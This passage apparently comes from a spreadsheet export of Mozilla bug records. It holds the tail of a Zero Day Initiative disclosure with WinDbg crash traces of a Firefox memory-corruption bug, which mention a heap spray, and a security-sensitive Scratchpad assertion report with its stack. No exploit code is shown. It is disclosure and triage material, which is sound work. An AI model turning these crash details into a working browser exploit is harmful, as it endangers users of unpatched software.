006dcf20 5b9d37e6 006dcf68 00000001 006dd030 xul!js::Invoke+0x10a (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 533]
006dcf5c 5b9d5090 006dd030 19f8db00 ffffff88 xul!js::InvokeSetter+0x4f (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 651]
006dcfb0 5b9d66f2 006dd094 006dd1d0 006dd030 xul!SetExistingProperty+0xfb (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\nativeobject.cpp @ 2289]
006dd054 5b9d4f36 006dd094 006dd1d0 0ee850b8 xul!js::NativeSetProperty+0x291 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\nativeobject.cpp @ 2323]
006dd0ac 5b8bbd69 0ee850b0 006dd1d0 0ee850b8 xul!SetPropertyOperation+0xa2 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 290]
006de0d4 5bd87e26 00000000 006de1d0 006de1d0 xul!Interpret+0x47c9 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 2601]
006de160 5b907258 156f76b0 006de1c0 19f95940 xul!js::RunScript+0x1f6 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 428]
006de1e4 5b9058bd 00000000 156f76b0 006de398 xul!js::Invoke+0x1f8 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 502]
006de280 5b72aac4 006de2b8 00000001 006de318 xul!js::Invoke+0x10a (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\js\src\vm\interpreter.cpp @ 533]
006de364 5b72ad13 156f76b0 006de398 177f08e0 xul!mozilla::dom::EventHandlerNonNull::Call+0x19a (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\obj-firefox\dom\bindings\eventhandlerbinding.cpp @ 260]
006de4d4 5b72a6f0 17763808 177f08e0 006de560 xul!mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports *&gt;+0xb2 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\obj-firefox\dist\include\mozilla\dom\eventhandlerbinding.h @ 351]
006de6e8 5b728688 17763800 177f08e0 006dea44 xul!mozilla::JSEventHandler::HandleEvent+0xf8 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\events\jseventhandler.cpp @ 216]
006de94c 5b727336 16770800 006deae8 006dea4c xul!mozilla::EventListenerManager::HandleEventInternal+0x298 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\events\eventlistenermanager.cpp @ 1164]
006de990 5b77a735 00000000 006dea34 00000000 xul!mozilla::EventTargetChainItem::HandleEventTargetChain+0x196 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\events\eventdispatcher.cpp @ 317]
006dea8c 5b7c763f 006deae8 00000000 006deae0 xul!mozilla::EventDispatcher::Dispatch+0x5c5 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\events\eventdispatcher.cpp @ 656]
006deb48 5b73bb2e 179ef950 00000000 157cec00 xul!nsDocumentViewer::LoadComplete+0x26f (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\layout\base\nsdocumentviewer.cpp @ 995]
006deeb0 5b73b8f7 157cec14 14cee02c 00000000 xul!nsDocShell::EndPageLoad+0xfb (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\docshell\base\nsdocshell.cpp @ 7505]
006def58 5b743547 157ced18 157cec14 14cee02c xul!nsDocShell::OnStateChange+0xc3 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\docshell\base\nsdocshell.cpp @ 7311]
006defa0 5b743bcc 157cec14 14cee02c 157ced18 xul!nsDocLoader::DoFireOnStateChange+0xc7 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\uriloader\base\nsdocloader.cpp @ 1256]
006deff8 5b743e4d 14cee02c 00000000 129697a0 xul!nsDocLoader::doStopDocumentLoad+0x6a (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\uriloader\base\nsdocloader.cpp @ 838]
006df034 5b744081 00000001 158cca20 157cec04 xul!nsDocLoader::DocLoaderIsEmpty+0x193 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\uriloader\base\nsdocloader.cpp @ 730]
006df0b8 5bb4c127 157cec04 16428e48 00000000 xul!nsDocLoader::OnStopRequest+0x15d (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\uriloader\base\nsdocloader.cpp @ 612]
006df180 5b749d68 158cca20 16428e48 00000000 xul!nsLoadGroup::RemoveRequest+0x195 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\netwerk\base\nsloadgroup.cpp @ 634]
006df1a8 5b7492ec 14cee800 12bf0600 11fbd420 xul!nsDocument::DoUnblockOnload+0x47 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nsdocument.cpp @ 9018]
006df1cc 5b74c830 00000001 024044c4 024081d0 xul!nsDocument::UnblockOnload+0xf1 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nsdocument.cpp @ 8947]
006df224 5b72ef6b 006df324 5b7ce89c 17766060 xul!nsDocument::DispatchContentLoadedEvents+0x131 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\dom\base\nsdocument.cpp @ 5087]
006df22c 5b7ce89c 17766060 02446650 02446640 xul!nsRunnableMethodImpl&lt;void (__thiscall mozilla::dom::Animation::*)(void),1&gt;::Run+0x17 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\obj-firefox\dist\include\nsthreadutils.h @ 872]
006df324 5b7cd8b6 024081d0 00000000 006df357 xul!nsThread::ProcessNextEvent+0x7bc (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\xpcom\threads\nsthread.cpp @ 997]
006df358 5ba5f12b 02453300 05d313e3 024044c0 xul!mozilla::ipc::MessagePump::Run+0x57 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\glue\messagepump.cpp @ 95]
006df390 5ba5f155 024081d0 00000001 5b7cd400 xul!MessageLoop::RunHandler+0x20 (FPO: [SEH]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\chromium\src\base\message_loop.cc @ 228]
006df3b0 5b7cda7b 0d07cfc0 00000000 006df3d0 xul!MessageLoop::Run+0x19 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\ipc\chromium\src\base\message_loop.cc @ 202]
006df3c0 5b7cf75f 024044c0 0d07cfc0 006df3e4 xul!nsBaseAppShell::Run+0x34 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\widget\nsbaseappshell.cpp @ 158]
006df3d0 5bb1540b 024044c0 006df72d 11fdafa0 xul!nsAppShell::Run+0x1d (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\widget\windows\nsappshell.cpp @ 257]
006df3e4 5bc4edf1 0d07cfc0 006df650 006df638 xul!nsAppStartup::Run+0x22 (FPO: [Non-Fpo]) (CONV: stdcall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\toolkit\components\startup\nsappstartup.cpp @ 282]
006df5c0 5bc4e2d9 00000001 006df760 01c82ff8 xul!XREMain::XRE_mainRun+0x5e7 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\toolkit\xre\nsapprunner.cpp @ 4326]
006df5dc 5bce6229 00000000 01c82ff8 006df760 xul!XREMain::XRE_main+0x118 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\toolkit\xre\nsapprunner.cpp @ 4423]
006df738 00ae16d5 00000001 01c82ff8 006df760 xul!XRE_main+0x3e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\toolkit\xre\nsapprunner.cpp @ 4526]
006df8d4 00ae1322 02404100 01c86ff8 01c82ff8 firefox!do_main+0x155 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\browser\app\nsbrowserapp.cpp @ 212]
006df97c 00ae10de 00ae257b 00ae257b 00000000 firefox!NS_internal_main+0x122 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\browser\app\nsbrowserapp.cpp @ 354]
006df990 00ae24fe 01c82ff8 feb68fb0 007edf70 firefox!wmain+0xbe (FPO: [Non-Fpo]) (CONV: cdecl) [c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\toolkit\xre\nswindowswmain.cpp @ 138]
006df9d8 754b4198 7fa89000 754b4170 5b470725 firefox!__tmainCRTStartup+0xfe (FPO: [Non-Fpo]) (CONV: cdecl) [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 255]
006df9ec 77723101 7fa89000 7ffab072 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo])
006dfa34 777230cf ffffffff 7774ed69 00000000 ntdll!__RtlUserThreadStart+0x2b (FPO: [SEH])
006dfa44 00000000 00ae257b 7fa89000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
0:000&gt; !lmi xul
Loaded Module Info: [xul]
         Module: xul
   Base Address: 5b660000
     Image Name: C:\Program Files\Nightly\xul.dll
   Machine Type: 332 (I386)
     Time Stamp: 569fa561 Wed Jan 20 07:18:57 2016
           Size: 27a4000
       CheckSum: 26fe897
Characteristics: 2122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    7a, 20dd3f8, 20dbff8 RSDS - GUID: {A83D4058-E28E-4EBF-A9BA-E1FE6EDD1A28}
               Age: 2, Pdb: c:\builds\moz2_slave\m-cen-w32-ntly-000000000000000\build\src\obj-firefox\toolkit\library\xul.pdb
                   ??    14, 20dd474, 20dc074 [Data not mapped]
                CLSID     4, 20dd488, 20dc088 [Data not mapped]
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files\Nightly\xul.dll
    Symbol Type: PDB      - Symbols loaded successfully from image path.
                 z:\export\symbols\xul.pdb\A83D4058E28E4EBFA9BAE1FE6EDD1A282\xul.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [12.0 bld 30723]
    Load Report: private symbols &amp; lines, source indexed
                 z:\export\symbols\xul.pdb\A83D4058E28E4EBFA9BAE1FE6EDD1A282\xul.pdb
0:000&gt; lmvm xul
start    end        module name
5b660000 5de04000   xul        (private pdb symbols)  z:\export\symbols\xul.pdb\A83D4058E28E4EBFA9BAE1FE6EDD1A282\xul.pdb
    Loaded symbol image file: C:\Program Files\Nightly\xul.dll
    Image path: C:\Program Files\Nightly\xul.dll
    Image name: xul.dll
    Timestamp:        Wed Jan 20 07:18:57 2016 (569FA561)
    CheckSum:         026FE897
    ImageSize:        027A4000
    File version:     46.0.0.5863
    Product version:  46.0.0.5863
    File flags:       2 (Mask 3F) Pre-release
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Nightly
    InternalName:     Nightly
    OriginalFilename: xul.dll
    ProductVersion:   46.0a1
    FileVersion:      46.0a1
    FileDescription:  46.0a1
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla
0:000&gt; vertarget
Windows 8 Version 9600 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.3.9600.17415 (winblue_r4.141028-1500)
Machine Name:
Debug session time: Thu Jan 21 13:03:26.371 2016 (UTC - 8:00)
System Uptime: 0 days 0:32:05.185
Process Uptime: 0 days 0:02:42.905
  Kernel time: 0 days 0:00:00.796
  User time: 0 days 0:00:02.375
```
And without the spray:
```
(9d4.77c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=ffffffff ecx=16f58efc edx=00000002 esi=179ab8b0 edi=0d363060
eip=5beda4da esp=00fad058 ebp=00fad06c iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210216
xul!nsHtml5TreeBuilder::endTag+0x3e9613:
5beda4da 83780c03        cmp     dword ptr [eax+0Ch],3 ds:0023:0000000c=????????
0:000&gt; dc @ecx
16f58efc  00000000 1101d100 1a19eb20 1a19ed00  ........ .......
16f58f0c  1a19ece0 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
16f58f1c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
16f58f2c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
16f58f3c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
16f58f4c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
16f58f5c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
16f58f6c  e5e5e5e5 e5e5e5e5 e5e5e5e5 e5e5e5e5  ................
```
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   ca0nguyen working with HP's Zero Day Initiative
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 120 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@hpe.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint and acquired by Hewlett-Packard, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is used. The ZDI does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its HP TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/</t>
        </is>
      </c>
      <c r="X2206" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2207">
      <c r="A2207" t="n">
        <v>736537</v>
      </c>
      <c r="B2207" t="inlineStr">
        <is>
          <t>2012-03-16 11:09:12 -0700</t>
        </is>
      </c>
      <c r="C2207" t="inlineStr">
        <is>
          <t>###!!! ASSERTION: Uh, cx is not the current JS context!: 'cx == GetCurrentJSContext()' setting location.href in scratchpad</t>
        </is>
      </c>
      <c r="D2207" t="inlineStr">
        <is>
          <t>2013-03-18 13:02:37 -0700</t>
        </is>
      </c>
      <c r="E2207" t="n">
        <v>1</v>
      </c>
      <c r="F2207" t="n">
        <v>1</v>
      </c>
      <c r="G2207" t="n">
        <v>3</v>
      </c>
      <c r="H2207" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2207" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2207" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2207" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2207" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2207" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2207" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2207" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2207" t="inlineStr">
        <is>
          <t>[sg:moderate][adv-track-main17+][adv-track-esr17+] possibly same issue as bug 747607</t>
        </is>
      </c>
      <c r="Q2207" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2207" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2207" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2207" t="n">
        <v>1</v>
      </c>
      <c r="U2207" t="n">
        <v>0</v>
      </c>
      <c r="V2207" t="n">
        <v>18</v>
      </c>
      <c r="W2207" t="inlineStr">
        <is>
          <t>Setting location.href in Scratchpad asserts with
###!!! ASSERTION: Uh, cx is not the current JS context!: 'cx == GetCurrentJSContext()', file c:/dev/mozilla-central/caps/src/nsScriptSecurityManager.cpp, line 396
Filing as security-sensitive just in case.
&gt;	xul.dll!NS_DebugBreak_P(unsigned int aSeverity, const char * aStr, const char * aExpr, const char * aFile, int aLine)  Line 264	C++
 	xul.dll!nsScriptSecurityManager::GetCxSubjectPrincipalAndFrame(JSContext * cx, JSStackFrame * * fp)  Line 396 + 0x28 bytes	C++
 	xul.dll!nsLocation::CheckURL(nsIURI * aURI, nsIDocShellLoadInfo * * aLoadInfo)  Line 242 + 0x18 bytes	C++
 	xul.dll!nsLocation::SetURI(nsIURI * aURI, bool aReplace)  Line 354 + 0x1c bytes	C++
 	xul.dll!nsLocation::SetHrefWithBase(const nsAString_internal &amp; aHref, nsIURI * aBase, bool aReplace)  Line 646 + 0x19 bytes	C++
 	xul.dll!nsLocation::SetHrefWithContext(JSContext * cx, const nsAString_internal &amp; aHref, bool aReplace)  Line 593 + 0x10 bytes	C++
 	xul.dll!nsLocation::SetHref(const nsAString_internal &amp; aHref)  Line 562 + 0x14 bytes	C++
 	xul.dll!NS_InvokeByIndex_P(nsISupports * that, unsigned int methodIndex, unsigned int paramCount, nsXPTCVariant * params)  Line 103	C++
 	xul.dll!CallMethodHelper::Invoke()  Line 3021 + 0x11 bytes	C++
 	xul.dll!CallMethodHelper::Call()  Line 2354	C++
 	xul.dll!XPCWrappedNative::CallMethod(XPCCallContext &amp; ccx, XPCWrappedNative::CallMode mode)  Line 2318 + 0x13 bytes	C++
 	xul.dll!XPC_WN_GetterSetter(JSContext * cx, unsigned int argc, JS::Value * vp)  Line 1579 + 0xe bytes	C++
 	mozjs.dll!js::CallJSNative(JSContext * cx, int (JSContext *, unsigned int, JS::Value *)* native, const js::CallArgs &amp; args)  Line 314 + 0xf bytes	C++
 	mozjs.dll!js::InvokeKernel(JSContext * cx, js::CallArgs args, js::MaybeConstruct construct)  Line 513 + 0x11 bytes	C++
 	mozjs.dll!js::Invoke(JSContext * cx, const JS::Value &amp; thisv, const JS::Value &amp; fval, unsigned int argc, JS::Value * argv, JS::Value * rval)  Line 560 + 0x23 bytes	C++
 	mozjs.dll!js::InvokeGetterOrSetter(JSContext * cx, JSObject * obj, const JS::Value &amp; fval, unsigned int argc, JS::Value * argv, JS::Value * rval)  Line 634 + 0x44 bytes	C++
 	mozjs.dll!js::Shape::set(JSContext * cx, JSObject * obj, bool strict, JS::Value * vp)  Line 311 + 0x18 bytes	C++
 	mozjs.dll!js_SetPropertyHelper(JSContext * cx, JSObject * obj, jsid id, unsigned int defineHow, JS::Value * vp, int strict)  Line 5460 + 0x18 bytes	C++
 	mozjs.dll!JSObject::setGeneric(JSContext * cx, jsid id, JS::Value * vp, int strict)  Line 172 + 0x18 bytes	C++
 	mozjs.dll!js::Wrapper::set(JSContext * cx, JSObject * wrapper, JSObject * receiver, jsid id, bool strict, JS::Value * vp)  Line 234 + 0x1b bytes	C++
 	mozjs.dll!js::CrossCompartmentWrapper::set(JSContext * cx, JSObject * wrapper, JSObject * receiver, jsid id, bool strict, JS::Value * vp)  Line 630 + 0x6f bytes	C++
 	mozjs.dll!js::Proxy::set(JSContext * cx, JSObject * proxy, JSObject * receiver, jsid id, bool strict, JS::Value * vp)  Line 885 + 0x2a bytes	C++
 	mozjs.dll!proxy_SetGeneric(JSContext * cx, JSObject * obj, jsid id, JS::Value * vp, int strict)  Line 1122 + 0x21 bytes	C++
 	mozjs.dll!JSObject::nonNativeSetProperty(JSContext * cx, jsid id, JS::Value * vp, int strict)  Line 3104 + 0x36 bytes	C++
 	mozjs.dll!JSObject::setGeneric(JSContext * cx, jsid id, JS::Value * vp, int strict)  Line 171 + 0x17 bytes	C++
 	mozjs.dll!js::SetPropertyOperation(JSContext * cx, unsigned char * pc, const JS::Value &amp; lval, const JS::Value &amp; rval)  Line 357 + 0x17 bytes	C++
 	mozjs.dll!js::Interpret(JSContext * cx, js::StackFrame * entryFrame, js::InterpMode interpMode)  Line 2591 + 0x12 bytes	C++
 	mozjs.dll!js::RunScript(JSContext * cx, JSScript * script, js::StackFrame * fp)  Line 469 + 0x7 bytes	C++
 	mozjs.dll!js::ExecuteKernel(JSContext * cx, JSScript * script, JSObject &amp; scopeChain, const JS::Value &amp; thisv, js::ExecuteType type, js::StackFrame * evalInFrame, JS::Value * result)  Line 667 + 0xb bytes	C++
 	mozjs.dll!js::Execute(JSContext * cx, JSScript * script, JSObject &amp; scopeChainArg, JS::Value * rval)  Line 709 + 0x1a bytes	C++
 	mozjs.dll!EvaluateUCScriptForPrincipalsCommon(JSContext * cx, JSObject * obj, JSPrincipals * principals, JSPrincipals * originPrincipals, const wchar_t * chars, unsigned int length, const char * filename, unsigned int lineno, JS::Value * rval, JSVersion compileVersion)  Line 5266 + 0xc bytes	C++
 	mozjs.dll!JS_EvaluateUCScriptForPrincipals(JSContext * cx, JSObject * obj, JSPrincipals * principals, const wchar_t * chars, unsigned int length, const char * filename, unsigned int lineno, JS::Value * rval)  Line 5277 + 0x2f bytes	C++
 	xul.dll!xpc_EvalInSandbox(JSContext * cx, JSObject * sandbox, const nsAString_internal &amp; source, const char * filename, int lineNo, JSVersion jsVersion, bool returnStringOnly, JS::Value * rval)  Line 3501 + 0x76 bytes	C++
 	xul.dll!nsXPCComponents_Utils::EvalInSandbox(const nsAString_internal &amp; source, const JS::Value &amp; sandboxVal, const JS::Value &amp; version, const JS::Value &amp; filenameVal, int lineNumber, JSContext * cx, unsigned char optionalArgc, JS::Value * retval)  Line 3402 + 0x28 bytes	C++
 	xul.dll!NS_InvokeByIndex_P(nsISupports * that, unsigned int methodIndex, unsigned int paramCount, nsXPTCVariant * params)  Line 103	C++
 	xul.dll!CallMethodHelper::Invoke()  Line 3021 + 0x11 bytes	C++
 	xul.dll!CallMethodHelper::Call()  Line 2354	C++
 	xul.dll!XPCWrappedNative::CallMethod(XPCCallContext &amp; ccx, XPCWrappedNative::CallMode mode)  Line 2318 + 0x13 bytes	C++
 	xul.dll!XPC_WN_CallMethod(JSContext * cx, unsigned int argc, JS::Value * vp)  Line 1539 + 0xd bytes	C++
 	mozjs.dll!js::CallJSNative(JSContext * cx, int (JSContext *, unsigned int, JS::Value *)* native, const js::CallArgs &amp; args)  Line 314 + 0xf bytes	C++
 	mozjs.dll!js::InvokeKernel(JSContext * cx, js::CallArgs args, js::MaybeConstruct construct)  Line 513 + 0x11 bytes	C++
 	mozjs.dll!js::Interpret(JSContext * cx, js::StackFrame * entryFrame, js::InterpMode interpMode)  Line 2684 + 0x27 bytes	C++
 	mozjs.dll!js::RunScript(JSContext * cx, JSScript * script, js::StackFrame * fp)  Line 469 + 0x7 bytes	C++
 	mozjs.dll!js::InvokeKernel(JSContext * cx, js::CallArgs args, js::MaybeConstruct construct)  Line 531	C++
 	mozjs.dll!js::Invoke(JSContext * cx, const JS::Value &amp; thisv, const JS::Value &amp; fval, unsigned int argc, JS::Value * argv, JS::Value * rval)  Line 560 + 0x23 bytes	C++
 	mozjs.dll!JS_CallFunctionValue(JSContext * cx, JSObject * obj, JS::Value fval, unsigned int argc, JS::Value * argv, JS::Value * rval)  Line 5389 + 0x24 bytes	C++
 	xul.dll!nsJSContext::CallEventHandler(nsISupports * aTarget, JSObject * aScope, JSObject * aHandler, nsIArray * aargv, nsIVariant * * arv)  Line 1880 + 0x2e bytes	C++
 	xul.dll!nsJSEventListener::HandleEvent(nsIDOMEvent * aEvent)  Line 239 + 0x43 bytes	C++
 	xul.dll!nsEventListenerManager::HandleEventSubType(nsListenerStruct * aListenerStruct, nsIDOMEventListener * aListener, nsIDOMEvent * aDOMEvent, nsIDOMEventTarget * aCurrentTarget, unsigned int aPhaseFlags, nsCxPusher * aPusher)  Line 744	C++
 	xul.dll!nsEventListenerManager::HandleEventInternal(nsPresContext * aPresContext, nsEvent * aEvent, nsIDOMEvent * * aDOMEvent, nsIDOMEventTarget * aCurrentTarget, unsigned int aFlags, nsEventStatus * aEventStatus, nsCxPusher * aPusher)  Line 800 + 0x1a bytes	C++
 	xul.dll!nsEventListenerManager::HandleEvent(nsPresContext * aPresContext, nsEvent * aEvent, nsIDOMEvent * * aDOMEvent, nsIDOMEventTarget * aCurrentTarget, unsigned int aFlags, nsEventStatus * aEventStatus, nsCxPusher * aPusher)  Line 169 + 0x18 bytes	C++
 	xul.dll!nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor &amp; aVisitor, unsigned int aFlags, bool aMayHaveNewListenerManagers, nsCxPusher * aPusher)  Line 216	C++
 	xul.dll!nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor &amp; aVisitor, unsigned int aFlags, nsDispatchingCallback * aCallback, bool aMayHaveNewListenerManagers, nsCxPusher * aPusher)  Line 349	C++
 	xul.dll!nsEventDispatcher::Dispatch(nsISupports * aTarget, nsPresContext * aPresContext, nsEvent * aEvent, nsIDOMEvent * aDOMEvent, nsEventStatus * aEventStatus, nsDispatchingCallback * aCallback, nsCOMArray&lt;nsIDOMEventTarget&gt; * aTargets)  Line 681 + 0x16 bytes	C++
 	xul.dll!nsEventDispatcher::DispatchDOMEvent(nsISupports * aTarget, nsEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus)  Line 744 + 0x14 bytes	C++
 	xul.dll!nsINode::DispatchEvent(nsIDOMEvent * aEvent, bool * aRetVal)  Line 1175	C++
 	xul.dll!nsContentUtils::DispatchXULCommand(nsIContent * aTarget, bool aTrusted, nsIDOMEvent * aSourceEvent, nsIPresShell * aShell, bool aCtrl, bool aAlt, bool aShift, bool aMeta)  Line 5793 + 0x15 bytes	C++
 	xul.dll!nsXULElement::PreHandleEvent(nsEventChainPreVisitor &amp; aVisitor)  Line 1694 + 0x2c bytes	C++
 	xul.dll!nsEventTargetChainItem::PreHandleEvent(nsEventChainPreVisitor &amp; aVisitor)  Line 276 + 0xf bytes	C++
 	xul.dll!nsEventDispatcher::Dispatch(nsISupports * aTarget, nsPresContext * aPresContext, nsEvent * aEvent, nsIDOMEvent * aDOMEvent, nsEventStatus * aEventStatus, nsDispatchingCallback * aCallback, nsCOMArray&lt;nsIDOMEventTarget&gt; * aTargets)  Line 628	C++
 	xul.dll!nsEventDispatcher::DispatchDOMEvent(nsISupports * aTarget, nsEvent * aEvent, nsIDOMEvent * aDOMEvent, nsPresContext * aPresContext, nsEventStatus * aEventStatus)  Line 744 + 0x14 bytes	C++
 	xul.dll!PresShell::HandleDOMEventWithTarget(nsIContent * aTargetContent, nsIDOMEvent * aEvent, nsEventStatus * aStatus)  Line 6739 + 0x12 bytes	C++
 	xul.dll!nsContentUtils::DispatchXULCommand(nsIContent * aTarget, bool aTrusted, nsIDOMEvent * aSourceEvent, nsIPresShell * aShell, bool aCtrl, bool aAlt, bool aShift, bool aMeta)  Line 5787 + 0x14 bytes	C++
 	xul.dll!nsXULMenuCommandEvent::Run()  Line 2362 + 0x25 bytes	C++
